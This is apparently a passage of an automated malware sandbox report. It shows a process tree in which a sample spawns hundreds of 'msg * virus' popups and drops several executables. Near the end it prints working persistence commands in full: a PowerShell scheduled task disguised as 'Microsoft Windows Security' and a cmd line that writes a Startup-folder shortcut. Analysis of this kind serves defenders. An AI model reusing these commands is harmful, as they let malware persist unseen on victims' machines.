    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14300
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14332
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14364
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14396
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14428
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14528
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14496
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14460
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14560
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14592
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14620
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14652
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14680
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14696
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14712
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14728
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14744
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14760
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14776
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14792
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14832
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14864
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14900
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14932
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14972
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:37904
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:37936
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:37968
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38000
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38036
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38068
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38100
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38132
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38160
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38192
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38224
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38256
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38292
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38324
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38356
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38388
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38416
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38448
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38480
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38572
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38600
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38616
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38632
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38656
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38672
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38696
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38720
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38744
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38768
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38792
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38816
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38836
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38856
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38880
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38900
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38924
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38948
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38980
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39000
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39020
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39044
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39456
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39488
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39512
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39540
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39568
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39592
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39620
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39636
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39652
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39668
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39728
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39780
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:15080
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39920
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39896
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39880
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39856
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39844
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39832
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:15124
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:15252
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:15292
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:15324
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:8408
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:8516
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39960
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39988
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:40020
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:40064
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:40124
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:40164
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:40216
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:40244
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:40276
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:40328
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:40356
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:40388
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:40432
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:40464
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:40492
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:40576
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:40628
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:40672
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:22268
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:40512
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:40520
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:3948
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:4748
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:4280
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:40600
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:2284
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:864
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:4796
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:4356
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:1508
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:40840
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:4332
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:40884
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:40932
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:40696
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:40692
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:8608
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:8540
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:40892
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:8624
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:8612
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:8640
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:40948
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:8556
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:8628
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:1812
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:3156
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:8804
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:8876
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:8884
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:9004
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:9128
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:3628
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:9140
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:644
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:9136
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:15384
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:15428
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:15460
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:31052
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:31088
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:31140
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:31176
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:31520
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:31452
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:31396
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:31332
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:31292
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:31220
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:31576
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:31632
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:31672
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:31732
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:32484
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:32516
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:15536
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:32472
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:15568
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:15584
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:31892
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:32084
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:32176
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:32424
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:32236
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:15828
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:32288
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:32320
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:15772
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:15836
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:15816
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:15844
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:15744
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:15800
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:32636
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:32648
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:32360
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:15864
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:32660
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:33504
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:33536
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:33568
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:33600
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:33636
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:33668
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:33712
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:33752
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:8076
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:8100
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:8168
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:3728
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:33796
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:33324
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:33280
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:33224
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:34356
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:33976
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:34008
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:34040
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:33192
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:34052
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:34080
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:34132
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:34100
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:34164
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:35728
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:33056
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:33088
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:33128
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:33168
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:34204
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:35684
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:33908
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:34244
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:34276
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:34420
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:35864
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:32980
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:33016
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:33896
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:34476
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:34448
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:35968
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:34520
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:36008
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:32912
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:34552
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:36088
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:36120
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:32724
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:34596
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:32800
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:32744
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:32832
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:34648
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:34616
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:36304
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:34736
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:34928
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14860
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:35496
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:15492
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:15412
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:15424
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14892
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:14924
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:34296
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:37972
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:15928
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38032
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38060
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38092
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:35352
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38148
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38172
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:15976
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:15984
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:16000
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:16048
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38516
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:15936
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38328
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:2224
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:2648
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38648
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:2616
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39028
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38984
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38940
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38860
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38796
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39136
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39076
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:38740
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39096
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39160
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:1560
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39372
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39340
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39304
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39272
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39472
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:39428
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:2376
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:19644
    - - C:\Windows\system32\msg.exe
        
        msg * virus
        5⤵
        
        PID:19972
- - C:\Users\Admin\AppData\Local\Temp\Files\frap.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\frap.exe"
    3⤵
    PID:13760
- - C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe"
    3⤵
    PID:38552
- - C:\Users\Admin\AppData\Local\Temp\Files\JJSploit_8.10.7_x64-setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\JJSploit_8.10.7_x64-setup.exe"
    3⤵
    PID:15116
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:18640
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
  2⤵
  PID:18912
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:19128
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:19316
- C:\Windows\System32\dwm.exe
  C:\Windows\System32\dwm.exe
  2⤵
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:19336
- C:\Windows\SysWOW64\cmd.exe
  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VibeStream.url" & echo URL="C:\Users\Admin\AppData\Local\StreamFlow Dynamics\VibeStream.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VibeStream.url" & exit
  2⤵
  - Drops startup file
  PID:37804
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2028
- C:\Windows\SYSTEM32\cmd.exe
